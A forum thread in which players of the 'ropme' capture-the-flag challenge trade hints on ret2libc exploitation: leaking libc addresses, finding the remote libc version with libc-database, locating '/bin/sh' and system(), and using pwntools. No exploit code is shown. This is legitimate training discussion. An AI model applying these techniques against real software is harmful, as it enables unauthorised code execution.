ropme

I was able to do everything except make it reopen the stdin again …
i managed to leak funtion@libc and got the libc offests
do i really need to reopen the stdin again to send the new payload or i’m missing something ?
can you please dm me ?

interesting challenge … thanks to @game0ver and @ippsec videos i was able to solve it
with good understanding of the challange …
hint : use pwntools it’s very handy

Hi all , sorry my english , i got bin/sh shell on my local machine with aslr on ,
how can i get sh_offset and system_offset on remote server

@gavz You have to leak a function’s address somehow and then you can easily compute libc base address. In this thread there are some information about how you can compute libc base address from a leak.

@game0ver said:
@gavz You have to leak a function’s address somehow and then you can easily compute libc base address. In this thread there are some information about how you can compute libc base address from a leak.

Thanks a lot , i solved this challenege

@BitTheByte said:
interesting challenge … thanks to @game0ver and @ippsec videos i was able to solve it
with good understanding of the challange …
hint : use pwntools it’s very handy

@BitTheByte Can you post a reference of the videos here ? because that fgets do not want to keep the stdin open …

I now have a locally working exploit, and also could finally figure out the libc version on the remote server, the problem now is although I’m definitely hitting system on the remote server I’m still not able to hit /bin/sh, the address I’m using for ‘/bin/sh’ is pointing to a random string and therefore returning command not found!

I even tried to dump the whole libc binary from the remote server and search it for ‘/bin/sh’, but my script is extremely faulty due to puts behaviour with null bytes, I guess.

Any clue about what I should be looking for?

I actually got it 10 minutes after posting the comment above lol. If someone else is having the same trouble, note that ‘/bin/sh’ is just a string not a function, there for it can be grabbed from anywhere in the memory (not necessarily libc, even a non-executable part of the memory would work) and will still be a valid argument for system().

actually had it all right on the first try and wasted ages trying to fix it because of that ■■■■ /bin/sh offset

anyone know why our string isn’t waiting for us there? is that actually part of the challenge?

For those of you that cannot find /bin/sh where you would expect it, have a look at the libc magic gadget

I’m pretty certain I found the correct libc and runs sh, but
I’m a big dumb dumb! I see what the issue is, I’m not actually running what I think. Similar to lots of issues already above.

Type your comment> @alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

Maybe 2 years ago the right libc was is this database. But now it isn’t. Anyway the challenge may be completed without the right libc :slight_smile:

Type your comment> @alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

You are a hero.

Hi guys) I have two questions:

  1. I follow the bitterman ippsec video way and developed the exploit. This exploit works in ellingson box also and gives a shell. But it doesn’t give a shell in this challenge, even locally on kali box! I get the “Got EOF while reading in interactive” error. What am i missing? PM, please:(
  2. I understand how to pwn the binary, but i can’t understand how to pwn the remote web service:( Where should i place my payload? In the body of post request? Or in the uri in GET request? Or where? Any hints really appreciated)

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.

[deleted]

@mkt said:

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.

I don’t have a VIP subscription, so I can’t start the retired challenge, but if you want, I can take a look at what you tried (and compare it to my notes/script).

I figured out why the leak only returns EOF and the solution for it. PM me for hint if you’re stuck the same way that I was.

For those who are doing the challenge but don’t wanna spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don’t get foolishly stuck like I did. In any case, you understand what you’re doing and it’s not your fault.

Here you can get it (since this is retired content I guess I can do this):

Please, be careful. Don’t install anything, just unpack it and find the file you’re looking for.

Type your comment> @lobo09 said:

For those who are doing the challenge but don’t wanna spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don’t get foolishly stuck like I did. In any case, you understand what you’re doing and it’s not your fault.

Here you can get it (since this is retired content I guess I can do this):
2.23-0ubuntu11 : libc6 : amd64 : Xenial (16.04) : Ubuntu

For anyone working on this… I first looked in https://libc.blukat.me/ to find the version and as @lobo09 mentioned it’s not there. Then I saw mention of a GitHub libc-database. Lucky for me, they are hosting it at https://libc.rip/

It took 1/2 a dozen tries to find the right library but it’s there. The 2.23-0ubuntu11 didn’t work on my instance.

John Hammond and IppSec have some great videos on YouTube using PwnTools for an exploit like this. They won’t show you this exact challenge but rather the workflow.